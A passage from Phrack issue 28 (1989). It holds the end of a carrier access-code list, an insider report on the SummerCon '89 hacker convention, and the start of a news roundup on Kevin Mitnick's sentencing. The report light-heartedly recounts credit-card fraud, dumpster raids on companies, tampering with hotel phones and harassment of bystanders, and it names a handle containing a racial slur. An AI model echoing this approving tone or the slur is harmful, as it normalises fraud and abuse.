  2238. 955     United Communications
  2239. 960     Access Plus
  2240. 963     Tenex Communications
  2241. 969     Dial-Net
  2242. 985     America Calling
  2243. 986     MCI Telecommunications (SBS)
  2244. 987     ClayDesta Communications
  2245. 988     Western Union Telegraph
  2246. 991     Access Long Distance
  2247. ____________________________________________________________
  2248.  
  2249.                                 ==Phrack Inc.==
  2250.  
  2251.                      Volume Three, Issue 28, File #8 of 12
  2252.  
  2253.            PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN
  2254.            ^*^                                                   ^*^
  2255.            PWN         P h r a c k   W o r l d   N e w s         PWN
  2256.            ^*^         ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~         ^*^
  2257.            PWN            Special Edition Issue Three            PWN
  2258.            ^*^                                                   ^*^
  2259.            PWN       "Meet The Hackers Behind The Handles"       PWN
  2260.            ^*^                 June 23-25, 1989                  ^*^
  2261.            PWN                                                   PWN
  2262.            ^*^          Created, Written, and Edited             ^*^
  2263.            PWN               by Knight Lightning                 PWN
  2264.            ^*^                                                   ^*^
  2265.            PWN ^*^ PWN ^*^ PWN { SummerCon '89 } PWN ^*^ PWN ^*^ PWN
  2266.  
  2267.  
  2268. SummerCon... What is it?  In many ways, SummerCon is much more
  2269. than just a convention that attracts America's greatest phreaking
  2270. and hacking personalities.  SummerCon is a state of mind.
  2271.  
  2272. Hackers by nature are urged on by a hidden sense of adventure to
  2273. explore the unknown, to challenge the unchallenged, to reach out
  2274. and experiment with anything and everything.  The realization
  2275. that we are not alone in our quest sometimes comes as a great
  2276. gift and the opportunity to meet one's heroes, partners, and
  2277. idols can be the most awe-inspiring aspect of the hacker
  2278. community -- this is what SummerCon is all about.
  2279.  
  2280. On the surface, SummerCon looks like a handful of youths hanging
  2281. out at a hotel in St. Louis, Missouri.  To me, it is more like
  2282. one of those madcap movies you see on late night Home Box Office
  2283. or something.  No real point or direction, rebels without cause,
  2284. all in the name of frantic fun and games.  The atmosphere
  2285. surrounding SummerCon is that of a dream world where once a year
  2286. you can escape to a fantasy where ingenuity is king and you have
  2287. friends around you at every moment.  SummerCon itself may only
  2288. last a weekend, but the friendships last a lifetime.
  2289.  
  2290. Welcome to SummerCon '89!  This special edition of Phrack World
  2291. News contains the exclusive coverage of the events and activities
  2292. of a handful of the nation's greatest hackers on June 23-25,
  2293. 1989.
  2294.  
  2295.  
  2296. PreCon '89:  Knight Lightning and Taran King Make Plans
  2297. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ We
  2298. remembered the fun at SummerCon '87 and how SummerCon '88 had
  2299. lacked something.  In a sense, the first SummerCon was very
  2300. private because almost all of the attendants were members on
  2301. Metal Shop Private, the bulletin board that was once the center
  2302. of the "elite" modem community.  The second SummerCon was a
  2303. little different.  Both Taran and I had been out of action for
  2304. nearly a year and we had not intended to hold another convention
  2305. ever again until June 1988 when we both decided that one good
  2306. convention deserves another.  SummerCon '88 was thrown together
  2307. and a few changes were made.  It was good, but this year we
  2308. decided to set our sights higher than ever.
  2309.  
  2310.  
  2311. PreCon '89:  The Early Birds                    Thursday Evening,
  2312. June 22, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The first guests to
  2313. this year's convention arrived a day ahead of schedule.  Control
  2314. C, a veteran of the previous two conventions, and Erik Bloodaxe
  2315. flew in to St. Louis on Thursday evening, June 22, 1989.  They
  2316. were greeted by Forest Ranger and then after some rowdy
  2317. activities at the airport, the threesome adjourned to the Best
  2318. Western Executive International hotel -- The very same hotel
  2319. where the first SummerCon was held in June 1987.
  2320.  
  2321. Around 10 PM, Taran King and I met up and being unable to locate
  2322. Control C, Erik Bloodaxe, and Forest Ranger, we decided to take a
  2323. trip to the hotel on the chance that they would be there by the
  2324. time we showed up.  As we approached the hotel, I felt a strange
  2325. sensation like deja-vu.  It had been two years since I had been
  2326. to the Executive International, or even anywhere near that part
  2327. of town (with the exception of the airport).  At any rate, luck
  2328. was on our side.  We raced through the newly remodeled hotel
  2329. lobby and out past the pool.  Control C's and Erik Bloodaxe's
  2330. room stuck out like a beacon.  Their room became known as the
  2331. "Doom Room" in recognition of the many members of the Legion of
  2332. Doom/Hackers that stayed there throughout the course of the
  2333. weekend.
  2334.  
  2335. Control C and Erik Bloodaxe told us all about Black Ice-Con which
  2336. had taken place the weekend prior to SummerCon '89 in Dallas,
  2337. Texas.  The supposedly secret convention had been infiltrated by
  2338. security agents from U.S. Sprint.  They believed that the leak
  2339. existed on Black Ice itself, the bulletin board from which the
  2340. con took its name and all members were invited (there were less
  2341. than 20 people on the board).  They named who they thought the
  2342. leak was, but discretion prevents printing his name here.  On a
  2343. side note, Black Ice was crashed by SuperNigger and abandoned by
  2344. the members of LOD thereafter.
  2345.  
  2346. Erik had some interesting business cards with him.  He passed
  2347. several of them out to interested hackers and other miscellaneous
  2348. people at the hotel and in the St. Louis metropolitan area as
  2349. well.  These cards featured Erik Bloodaxe and the following
  2350. organizations;
  2351.  
  2352. -    American Telephone & Telegraph [AT&T] -    Federal Bureau of
  2353. Investigation [FBI] (Department of Justice) -    Secret Service
  2354. (Department of Treasury) -    Southwestern Bell Telephone Company
  2355. -    Tymnet (McDonnel Douglas)
  2356.  
  2357. Erik gave Taran and I each a set of the cards as souvenirs of his
  2358. visit.  Both of us had to work early morning shifts the next day
  2359. so a little after midnight we decided to leave.  I finally went
  2360. to sleep around 1 AM.
  2361.  
  2362.  
  2363. SummerCon '89:  The Adventure Begins              Friday Morning,
  2364. June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I woke up
  2365. around 5 AM to begin my day.  I had arranged to work the morning
  2366. shift 6-10 AM in order to avoid having to work the rest of the
  2367. day and weekend.  I returned home around 10:30 AM and I began the
  2368. final work on Phrack 27.  Although the issue date is June 20,
  2369. 1989, we did not really release the issue until June 27, due to
  2370. complications with SummerCon '89 and other events.  All of the
  2371. sudden I received a call from another veteran of SummerCons past,
  2372. a person who swore that he would not appear at this year's
  2373. convention...  TUC!
  2374.  
  2375. He tried to convince me that he was in Florida or anywhere but
  2376. St. Louis.  I asked him if he needed a ride from the airport to
  2377. the hotel or something.  The call sounded local as hell, but he
  2378. insisted on remaining consistent with his story for another few
  2379. minutes.  Then my call waiting beeped and it was Taran King.  I
  2380. juggled the lines for a few minutes and then had Taran call Tuc
  2381. (who was at the Executive International) while I got ready to go
  2382. meet him at the hotel.
  2383.  
  2384. As I was leaving my home, I noticed something sticking to the
  2385. front door.  It was a notice from United Parcel Service.  How
  2386. odd.  I did not notice it at 10:30 AM when I returned home and I
  2387. did not not hear anyone knock on the door since I had been home.
  2388. Still, the note said that they had left my package at the
  2389. subdivision club house.
  2390.  
  2391. So I dropped in there and found my package... would you believe
  2392. it came from Francis J. Haynes... Frank of "Frank and the Phunny
  2393. Phone Call" himself and that is exactly what was inside:  A
  2394. cassette tape sampler of Frank and the Phunny Phone Call.
  2395. Incidentally, Frank is being mastered on to compact disc and will
  2396. be available for sale soon.  More details on this will appear in
  2397. Phrack World News in the near future.
  2398.  
  2399. Eventually, I reached the hotel.  Control C and Erik Bloodaxe
  2400. were nowhere to be found and Forest Ranger and Taran King were
  2401. unavailable.  I found Tuc and we decided to go grab lunch and
  2402. drive around for a while.
  2403.  
  2404. We returned to the hotel and traded war stories about the past
  2405. year and decided to call the hotel office to see who might have
  2406. checked in during the past few hours.  No one we recognized was
  2407. here yet, but there was a call for Tuc on another line.  The lady
  2408. at the office switched the call into Tuc's room and I picked it
  2409. up.
  2410.  
  2411. It was Crimson Death of 618.  He wanted us to know that he was
  2412. arriving by bus later that evening and would need a ride at about
  2413. 10:45 PM.  He also informed us that Dr. Cypher was on his way in
  2414. and would arrived at the airport's bus terminal and take the
  2415. shuttle to the hotel.  He was unsure about what time this would
  2416. occur.
  2417.  
  2418. I told him I could pick him up at the bus terminal and that I had
  2419. to get off the phone.  I did, you see because it was at about
  2420. this time that Tuc had opened the windows and looked out by the
  2421. pool terrace.  Control C, Erik Bloodaxe, Forest Ranger, The
  2422. Urvile, and a guy by the name of Phil Free (known under various
  2423. other handles including Judas Christ) were out poolside and upon
  2424. noticing us had run over to climb through the window into the
  2425. room.
  2426.  
  2427.  
  2428. A Gathering Of Phreaks                          Friday Afternoon,
  2429. June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~ Finally the convention began
  2430. to get underway.  Greetings were exchanged and some discussion
  2431. about last year's convention took place.  I had brought laser
  2432. printed copies of Phracks 21 - 26 into Tuc's room and everyone
  2433. was interested in taking a look.  The Urvile was especially
  2434. curious about a certain quicknote that appeared in Phrack World
  2435. News Issue XXV/Part 3.  I would guess that the particular
  2436. quicknote in question was number five...it was about Telenet
  2437. security, but this is a story for another day.
  2438.  
  2439. The phone rang and Tuc answered.  He handed the phone to Control
  2440. C, who then disappeared without saying anything.  It was obvious
  2441. that Lex Luthor had arrived.  However, he wished to make his
  2442. current state of residence remain anonymous and so he decided to
  2443. park his car someplace other than the hotel parking lot and thus
  2444. he needed covert assistance.  After a few minutes Control C
  2445. returned with Lex and then all of the LODies ran quickly to the
  2446. Doom Room.  Taran King showed up around this time and then Tuc,
  2447. FR, TK, and I joined the others.
  2448.  
  2449. Shortly afterwards, Taran King, Erik Bloodaxe, and I decided to
  2450. go have a listen to Frank and the Phunny Phone Call.  I had not
  2451. played it yet and so we set up in the hotel lobby.  The first
  2452. part of the tape was not about Frank at all.  It was a
  2453. never-released, newly produced musical selection that seemed to
  2454. be called "My Telephone Is Acting Crazy."  It was interesting as
  2455. it employed different familiar telephone error messages, common
  2456. types of recordings, and touch tones.  When the actual Frank
  2457. messages began, we stopped the tape and left the lobby
  2458. immediately to avoid being thrown out -- the language was a
  2459. little too obscene for the conservative employees behind the
  2460. desk.  So we wandered the hotel looking for a place to play the
  2461. tape.  In the process we met Doc Holiday and Hugo Danner.
  2462.  
  2463. We finally gained access to Tuc's room (he was with Forest
  2464. Ranger, Phil Free, and the LOD in the Doom Room).  Doc Holiday
  2465. and Hugo went to drop their bags off in their room and ended up
  2466. in the Doom Room as well.  TK, EB, and I remained in Tuc's room
  2467. to hear the rest of the tape.  There was a knock at the door...
  2468. it was Bill From RNOC.
  2469.  
  2470. Taran and BFR disappeared almost instantly as Erik Bloodaxe began
  2471. to pursue Bill.  He evidently had some score to settle.  However,
  2472. TK and BFR were gone as if they had become invisible.  Erik
  2473. decided to finish listening to the tape.  We did and then went on
  2474. to the Doom Room where we discovered Lucifer 666 and Synthetic
  2475. Slug had arrived.  L666 had many stories to tell about their trip
  2476. to St. Louis and he also brought a video camera.  His biggest
  2477. concern was that his camera would scare the hell out of Lex...
  2478. and to some extent it did.  You see, as it was explained to me by
  2479. the LOD members (with Lex Luthor absent at the time) there is
  2480. paranoia and beyond paranoia, there is Lex.
  2481.  
  2482.  
  2483. SummerCon Craziness                             Friday Afternoon,
  2484. June 23, 1989 ~~~~~~~~~~~~~~~~~~~ As many readers might already
  2485. known, St. Louis is the world headquarters for McDonnell Douglas
  2486. Aircraft, the firm that also owns Tymnet.  This was no secret to
  2487. the Legion of Doom, who led a series of successful trashing raids
  2488. on them as well as Southwestern Bell and IBM.  The way I heard
  2489. it, they even took pictures.
  2490.  
  2491. Meanwhile, after spending some time hanging out with the gang at
  2492. the Executive International, Bill From RNOC, Taran King, Tuc, Lex
  2493. Luthor, and I went to get a bite to eat.  We ended up at Wendy's
  2494. because Tuc, being a vegetarian, wanted the salad bar.  We had a
  2495. little fun harassing the staff (who still owes BFR an iced tea).
  2496. We began to speculate on who this year's security agent would
  2497. be... after all there is always some informant or plant at
  2498. SummerCon -- it has become a tradition.
  2499.  
  2500. At this point, everyone's best bet was on Dr. Cypher.  Cypher had
  2501. admitted to having connections on the security side of things,
  2502. had once claimed to be busted and/or retired, supposedly told
  2503. U.S. Sprint all about Black Ice Con (to hell with discretion),
  2504. and all in all, was the major unknown who best fit the mold set
  2505. forth by Dan The Operator at SummerCon '87 (although his friend
  2506. that showed up with him, Cryptic Fist fit the mold rather well
  2507. too, but this is detailed later).  This is just what I had
  2508. gathered from various people at the convention and are not
  2509. necessarily my personal views.
  2510.  
  2511. The obvious telephone security person there was from Michigan
  2512. Bell -- Control C -- But no one was really worried about him.  He
  2513. had been able to attend Black Ice-Con and SummerCon '88 all
  2514. expenses paid by Michigan Bell, but he said that since his
  2515. superiors have read the PWN reports of SummerCons past, they felt
  2516. that this trip was pleasure, not business, and would not give him
  2517. a free ride any longer.
  2518.  
  2519. I hate to break this to the security folks out there, but
  2520. honestly, do you think I would write an article and include
  2521. information like whose computers, passwords, codes, and whatever
  2522. were handed out and discussed?  Why create negative publicity
  2523. like that.  Don't you all worry though... none of that EVER goes
  2524. on at SummerCon :-)
  2525.  
  2526. Before we left Wendy's, Tuc and BFR grabbed a stack of taco
  2527. shells and as we journeyed towards the hotel, BFR and Tuc
  2528. proceeded to throw parts of these shells at other vehicles and
  2529. pedestrians.  A few minutes after we had returned, everyone began
  2530. getting together to go pickup Android Pope (aka Cisban Evil
  2531. Priest) at the airport.  It was 7:15 PM by now and his flight
  2532. from New Jersey was supposed to arrive at 7:54 PM.
  2533.  
  2534.                "Are you an agent of the FBI or Secret Service?!"
  2535.  
  2536. This was Lucifer 666's standard question that he asked everyone
  2537. he came into contact with at the hotel -- guests, office
  2538. personnel, porters, and even the shuttle bus driver.  They all
  2539. replied with a confused "no."  It seemed to take an hour to get
  2540. the shuttle bus ready for passengers.  Bill From RNOC, Taran
  2541. King, and I were going to just hang out at the hotel, but I was
  2542. shanghaied on to the bus to the airport.
  2543.  
  2544. Just before we took off, the older gentleman that was serving as
  2545. our bus driver turned around and said, "You know how you fellas
  2546. were asking me if I was with the FBI..."  We all froze instantly
  2547. as he pulled out his badge.  No, he was not with the FBI, but he
  2548. was a recently retired deputy police chief for the St.  Louis
  2549. County Police Department.  Control C later remarked to me that
  2550. when the driver had shown his badge, he had half expected to hear
  2551. a loud series of clicks as the locks to all of the doors on the
  2552. shuttle bus shut and a barrier of some sort appeared between the
  2553. driver and the passengers... all of whom were SummerCon guests.
  2554.  
  2555. Instead, several of the hackers, Hugo and Forest Ranger for the
  2556. most part, began to question the retired officer about his gun
  2557. fights.  The driver remarked how he had been shot before and even
  2558. went so far as to show us some of his scars.  Lucifer asked, "Did
  2559. you kill the guy who shot you?"  The driver responded,
  2560. "Certainly."  This line of questioning went on for the duration
  2561. of the trip.  We got to the airport and moved out.
  2562.  
  2563.  
  2564. Erik Bloodaxe:  Missing In Action                 Friday Evening, June 23, 1989
  2565. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2566. Upon entering the lower terminal of Lambert Field (St. Louis
  2567. International Airport), this "motley crew" encountered a blonde
  2568. bombshell named Stephanie on one of the nearby payphones.
  2569. Control C was the first to approach her and he asked her if she
  2570. was talking to her boyfriend.  She wasn't and so he proceeded to
  2571. take the handset and talk to her friend.  In the meantime,
  2572. Lucifer 666 was filming the entire affair and several members of
  2573. the group (not including Lex or Tuc) began having their pictures
  2574. taken with blondie.  This situation soon turned to riot as almost
  2575. everyone wanted in on this action.  Eventually we shuffled off to
  2576. the American Airlines ticket counter to check up on Android
  2577. Pope's flight while Forest Ranger apologized for our behavior.
  2578.  
  2579. The scene at the ticket counter was somewhat grim.  You see
  2580. Android Pope was scheduled to arrive at 7:54 PM and apparently
  2581. the flight's arrival had been delayed... until 9:00 PM at the
  2582. earliest.  In the meantime, Forest Ranger was having a little
  2583. chat with Erik Bloodaxe.  He told EB that the blondie chick
  2584. thought he was a big geek and some other nasty things.  Erik
  2585. became so depressed that he headed back to talk to her again, but
  2586. none of us knew it at the time.
  2587.  
  2588. So now we had to kill an hour.  We started towards the far end of
  2589. the airport where a restaurant and bar were located.  On the way,
  2590. we encountered some people striking against Eastern and
  2591. Continental Airlines and handing out stickers that showed
  2592. "Lorenzo" with a circle around his name and a line through it
  2593. (much like a no U-turn sign or the NO FEDS pin from SummerCon
  2594. '88).  We took a lot of those stickers and put them on
  2595. unsuspecting people all over the airport.
  2596.  
  2597. Upon reaching the area just outside of the bar, we found a row of
  2598. payphones, a fancy vintage replica of a car, and a wheelchair.
  2599. Control C hopped into the chair (deja vu of SummerCon '87
  2600. occurred here when I remembered how Control C ended up in a
  2601. swimming pool last time) and Lucifer 666 started driving him all
  2602. about the airport.  The problem was that the wheelchair belonged
  2603. to this lady who was on the payphones and when she finally
  2604. noticed that it was missing she tracked Control and L666 down
  2605. screaming theft.
  2606.  
  2607. Finally we got to the bar.  We sat down and talked for a while
  2608. watching planes take off and land.  After a few minutes I noticed
  2609. that Erik had disappeared.  We retraced our steps all the way
  2610. back to the payphones where we encountered blondie without any
  2611. success whatsoever.  Then we went to the American Airlines ticket
  2612. counter and had Erik paged.  We also did the same thing at the
  2613. Trans World Airlines and Braniff ticket counters.
  2614.  
  2615. Since we could not find him, about half of us decided it was time
  2616. to head back to the hotel and let the rest of the group wait for
  2617. Android Pope.  We all went out to the street where the buses stop
  2618. and waited.  A very strange incident took place here.  Another
  2619. group of guys ventured forth with a person who was blindfolded
  2620. and handcuffed.  They said, "This is what happens when you break
  2621. the law guys... illegal trafficking in cocaine... Columbian."
  2622. Forest Ranger asked if they had any to spare.  Oddly enough, they
  2623. had their own video camera and were filming this and us while we
  2624. were filming them.  They soon disappeared into a parking garage.
  2625.  
  2626. Eventually the bus came and picked us up.  The Urvile, Lucifer
  2627. 666, Tuc, and Doc Holiday stayed behind to search for Android
  2628. Pope.  They caught a later shuttle bus back to the hotel.
  2629. However, mere moments after they had arrived, Dr. Cypher showed
  2630. up claiming he had just got off the shuttle bus.  Obviously this
  2631. could not be true because these buses are very small and there is
  2632. no way L666, Urvile, Tuc, DH, and AP could have missed him and
  2633. his friend Cryptic Fist.
  2634.  
  2635. It was around 11:00 PM when I remembered that Crimson Death was
  2636. due at the bus station downtown.  Bill From RNOC and Taran King
  2637. accompanied me to go pick him up and were we ever surprised when
  2638. we saw him.  He was no longer the short little kid we had met at
  2639. SummerCon '88.
  2640.  
  2641. We returned to the hotel to discover that Erik Bloodaxe had
  2642. finally made it back.  After hearing what Forest Ranger told him
  2643. about what Stephanie had to say (calling him a geek or something
  2644. similar), he decided to go to her again.  He walked with her to
  2645. her gate and stayed until her plane left.  He later remarked that
  2646. he had heard us paging him, but decided to ignore it.  After his
  2647. return, the entire SummerCon group headed out to the midnight
  2648. showing of the premiere day of "Batman."  L666 attempted to sneak
  2649. his video camera into the movie, but changed his mind and did a
  2650. "jaywalk" instead.  After the flick everyone just hung out for a
  2651. while.  The Doom Room crew went to sleep because Control C had an
  2652. early flight to catch the next morning and Taran and I crashed
  2653. around 5:30 AM.
  2654.  
  2655.  
  2656. Conference Day A.M.                             Saturday Morning, June 24, 1989
  2657. ~~~~~~~~~~~~~~~~~~~
  2658. The hotel was trashed.  Forest Ranger and Lucifer 666 watched as
  2659. the hotel employees were forced to clean up the mess that was
  2660. left behind after the previous evening's activities.  One maid
  2661. remarked, "I know my boss wants your business, but he sure as
  2662. hell don't want all these beer cans."  Control C was gone, but he
  2663. had performed a practical joke on Lucifer 666 and Synthetic Slug
  2664. before he left, leaning a trashcan full of ice on their door so
  2665. that when it was opened, all of the ice would fall into the room.
  2666. According to Erik Bloodaxe, Control C also walked off with a jean
  2667. jacket that did not belong to him -- No honor among hackers?
  2668.  
  2669. Aristotle and Predat0r arrived sometime during the morning with a
  2670. small suitcase full of TAP issues and other materials for the
  2671. convention.  Crimson Death lit a pizza on fire in one of the
  2672. rooms in order to perform a demonic ritual that was reminiscent
  2673. of the first SummerCon (1987) when Lucifer 666 attempted
  2674. (unsuccessfully) to eat fire.
  2675.  
  2676.  
  2677. The Conference                                Saturday Afternoon, June 24, 1989
  2678. ~~~~~~~~~~~~~~
  2679. It was at this time that Taran King, Forest Ranger, and I handed
  2680. out the Official SummerCon '89 buttons and posters.  In addition
  2681. to this, I handed out keychain flashlights that showed the logo
  2682. of Ameritech as well as a few specially designed "Legion" buttons
  2683. to the LOD members that were there.
  2684.  
  2685. Forest Ranger got things started by welcoming everyone to the
  2686. conference and asking them to take a seat.  Mysteriously, Dr.
  2687. Cypher had decided not to attend the conference, but his pal
  2688. Cryptic Fist was there with a micro-tape recorder in the pocket
  2689. of his leather jacket (that he refused to take off even though it
  2690. was a blistering 94 degrees).
  2691.  
  2692. Our first speaker was Aristotle.  He talked for a while about the
  2693. new TAP Magazine, how it worked, and how to subscribe.  He took
  2694. quite a beating from the large amount of criticism directed at
  2695. him because of the lack of originality in the name of the
  2696. publication as well as not having been given official permission
  2697. to use the name.  As it turns out, the ownership of the TAP name
  2698. currently resides with Tuc.  Tuc was there at the conference, so
  2699. Aristotle put the question to him, "Can I do it?"  Tuc basically
  2700. said he thought it was ok, but he wanted to talk to Cheshire
  2701. Catalyst about it.  The situation remains unresolved.
  2702.  
  2703. The next speaker was Lex Luthor.  Lex discussed a topic that was
  2704. a little more familiar to most everyone at the conference -- Code
  2705. Abuse.   For the most part, he presented the standard methods in
  2706. which companies try and track down code abusers and strongly
  2707. advised that everyone not abuse codes.  He also went on to
  2708. criticize Brew Associates for releasing a new edition of Code
  2709. Thief.
  2710.  
  2711. Taran and I spoke next.  For the most part we talked about Phrack
  2712. Inc. and what lies ahead concerning the newsletter.  We also
  2713. brought up discussion on the Internet and the plausibility of
  2714. security agencies using "grep" to track down hackers across the
  2715. world.  We also discussed our recent excursion through a GTE
  2716. Central Office and what we found.
  2717.  
  2718. The Urvile gave a short lecture on Unix hacking and then it was
  2719. Bill From RNOC's turn to speak.  For the most part, he discussed
  2720. 2600 Meetings (that take place once a month at The Citicorp
  2721. Center in New York City).  He spoke briefly about Eric Corley and
  2722. the publication 2600 Magazine.  Afterwards, he played a humorous
  2723. recording in which he engineered an insane gentleman to believe
  2724. that he was a news reporter and got his story about computers in
  2725. Utah taking over the world.  That concluded the regularly
  2726. scheduled speakers.
  2727.  
  2728. Group discussion began and the topics included:  TelePub '86,
  2729. Scan Man, Cheshire Catalyst, The Bootleg, and Red Knight.  We
  2730. listened to segments of Frank and The Phunny Phone Call and Group
  2731. Bell Presents the Adventures of Dom Tuffy for a while and then
  2732. started being really creative.  In a high spirited moment we
  2733. formed a large human pyramid and took pictures (that are supposed
  2734. to appear in TAP Magazine's next issue).
  2735.  
  2736.  
  2737. Poolside and Mellow                             Saturday Evening, June 24, 1989
  2738. ~~~~~~~~~~~~~~~~~~~
  2739. Aristotle, Predat0r, Doc Holiday, and Hugo Danner had to hit the
  2740. road soon after the convention ended.  However, another friend
  2741. named Stephan showed up after the conference and so did Doctor
  2742. Cypher with ParMaster and Rabbit.  Cypher told us a story about
  2743. how PM and Rabbit had carded plane tickets to St.  Louis and
  2744. stayed at the Holiday Inn-West.  However, after running up huge
  2745. tabs at the hotel, the management asked them to pay up in cash
  2746. and would not accept their credit card numbers.  They made a
  2747. narrow escape from the hotel and arrived at Best Western to stay
  2748. the night.
  2749.  
  2750. Par and Rabbit were very outgoing, they wanted to have Tuc, Lex,
  2751. and Erik come to their yacht in New York and go sailing.  It was
  2752. a very strange situation and parts of their story still do not
  2753. seem to make sense even today.  However, they proceeded to "fuck
  2754. the phones" at the hotel so that all calls going to the front
  2755. desk would be intercepted into BFR's room.  This was not very
  2756. pleasurable.
  2757.  
  2758. Most people went downtown for dinner that night and then everyone
  2759. ended up outside by the pool having a few drinks.  At one point
  2760. in the evening, Taran, BFR, Stephan, Forest Ranger, and I went
  2761. back to BFR's room and were followed by Erik Bloodaxe.  He
  2762. accused Bill of being a cocaine dealer and Forest Ranger erupted,
  2763. "THAT'S NOT COOL FUCKING WITH RNOC MAN!" and the two of them
  2764. (Erik and FR) came very close to blows.  It was soon settled and
  2765. the partying resumed.  A small group of us went on a mission that
  2766. night and what we discovered is a story for another day, but it
  2767. kept us busy until almost 6 AM.
  2768.  
  2769.  
  2770. So Long Farewell                                          Sunday, June 25, 1989
  2771. ~~~~~~~~~~~~~~~~
  2772. With the exception of Erik Bloodaxe, the Legion of Doom gang had
  2773. disappeared by the time Taran and I showed up at Best Western.
  2774. In fact, the only other hackers remaining in the vicinity were
  2775. Forest Ranger, BFR, Stephan, L666, and Synthetic Slug as far as
  2776. we could tell.  We said goodbye to L666 and SS and the rest of us
  2777. (not including Erik Bloodaxe, Tuc and Crimson Death who we found
  2778. out later were still in town) journeyed to Westport Plaza where
  2779. we spent the rest of the afternoon until it was time for BFR and
  2780. Stephan to catch their flights.  And that was SummerCon '89.
  2781. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2782.  
  2783. The following are the people who attended SummerCon '89:  (23
  2784. Total)
  2785.  
  2786.              Android Pope \ Aristotle \ Bill From RNOC \ Control
  2787.   C Crimson Death \ Cryptic Fist \ Doc Holiday \ Doctor Cypher \
  2788.   Erik Bloodaxe
  2789.    Forest Ranger \ Hugo Danner \ Knight Lightning \ Lex Luthor \
  2790.      Lucifer 666 ParMaster \ Phil Free \ Predat0r \ Rabbit \
  2791.      Stephan \ Synthetic Slug
  2792.                          Taran King \ Tuc \ The Urvile
  2793.  
  2794. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2795.  
  2796. Who Didn't Attend SummerCon '89... And Why!
  2797. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2798. Ax Murderer:  "Definitely next year."
  2799. Bad Subscript:  "Dan wouldn't pay for me this time."
  2800. Broadway Hacker:  "I have a date that weekend."
  2801. Cheshire Catalyst:  "I have a HAM convention."
  2802. CompuPhreak:  "I was trying to fix my Watson."
  2803. Eric Corley:  "It's either this or GHP."
  2804. Cray-Z Phreaker and SkunkWorks gang:  "I was competing in a regatta."
  2805. DarkMage:  "My hard disk drive broke and I need the cash to fix it."
  2806. The Datamaster, Peter Pulse, Magnetic Surfer:  "It should be in New York City."
  2807. Dave Starr:  (Disappeared off of the face of the earth again)
  2808. Dead Lord:  "I was at camp."
  2809. Delta-Master:  "I am going to the Galactic Hackers Party too."  (No show)
  2810. The Disk Jockey and Shade:  "I thought it was next weekend...sorry."
  2811. Epsilon:  "My mom said she didn't feel like going to St. Louis."
  2812. The Executioner:  "I had a beauty shop appointment."
  2813. Katie Hafner:  "Forest Ranger would not let me go."
  2814. Hatchet Molly:  "I got married."
  2815. Karl Marx:  "I had a job interview... sue me."
  2816. The Leftist:  "<Sniff> I'm in the hospital."
  2817. MAC???:  "Why don't you guys have it in California this year?"
  2818. John Maxfield:  "I was there... the Holiday Inn-West, right?"
  2819. The Mentor:  "I'll have my own in Texas instead."
  2820. Oryan QUEST:  "I got deported."
  2821. Phantom Phreaker and Doom Prophet:  "We went camping... with our parents."
  2822. Phrozen Ghost and Surfer Bob:  "Scared of seeing Crimson Death."
  2823. Promethius:  "I decided to spend the weekend with Broadway Hacker instead."
  2824. Red Knight:  "I was in Kenya visiting relatives."
  2825. Remington Steal and Chanda Leir:  "We'd rather be alone if you don't mind."
  2826. Sigmund Fraud:  "I still have another 7 or 8 weeks of basic training."
  2827. Silver Spy:  "I'll be there if I can."
  2828. Sir Francis Drake:  "Had to get my other nostril pierced."
  2829. The Renegade Chemist:  "I didn't feel like taking the heat for MY TAP."
  2830. Tuc:  "I am never coming to another convention again... whoops!"
  2831. VaxCat and Phase Shifter:  (In August) "When is that anyway?"
  2832. Violence and The Scythian:  "We got busted by SoutherNet, but we'll be there!"
  2833.  
  2834. Needless to say, those who missed the convention, missed out.  Plans are
  2835. already underway for SummerCon '90 --KL
  2836. __________________________________________________________________
  2837.  
  2838.                                 ==Phrack Inc.==
  2839.  
  2840.                      Volume Three, Issue 28, File #9 of 12
  2841.  
  2842.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2843.             PWN                                                 PWN
  2844.             PWN        P h r a c k   W o r l d   N e w s        PWN
  2845.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  2846.             PWN               Issue XXVIII/Part 1               PWN
  2847.             PWN                                                 PWN
  2848.             PWN                 October 7, 1989                 PWN
  2849.             PWN                                                 PWN
  2850.             PWN          Created, Written, and Edited           PWN
  2851.             PWN               by Knight Lightning               PWN
  2852.             PWN                                                 PWN
  2853.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  2854.  
  2855.  
  2856.                  Welcome to Issue XXVIII of Phrack World News!
  2857.  
  2858. This issue of Phrack World News contains stories and articles
  2859. detailing events from June - October, 1989 and features Bellcore,
  2860. Chalisti, Chaos Computer Club, Clifford Stoll, The Disk Jockey,
  2861. Fry Guy, The Grim Phreaker, Legion of Doom, The Leftist, Major
  2862. Havoc, Kevin Mitnick, Robert Morris, Oryan QUEST, The Prophet,
  2863. Red Rebel, Shadow Stalker, Shadow 2600, Terra, The Urvile, and
  2864. much more so keep reading.
  2865.  
  2866.         "The Real Future Is Behind You... And It's Only The
  2867. Beginning!"
  2868. _______________________________________________________________________________
  2869.  
  2870. Judge Suggests Computer Hacker Undergo Counseling
  2871. July 17, 1989
  2872. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2873. by Karen E. Klein (New York Times)
  2874.  
  2875. LOS ANGELES -- A federal judge has suggested that Los Angeles
  2876. computer hacker Kevin Mitnick be sentenced to a one-year
  2877. residential treatment program to break his "computer addiction."
  2878.  
  2879. Although she did not finalize her sentence, U.S. District Judge
  2880. Mariana R.  Pfaelzer said Monday that she thought Mitnick had
  2881. some problems that would
  2882. benefit from counseling.
  2883.  
  2884. Pfaelzer will actually pass sentence at a hearing set for
  2885. Tuesday, July 18.
  2886.  
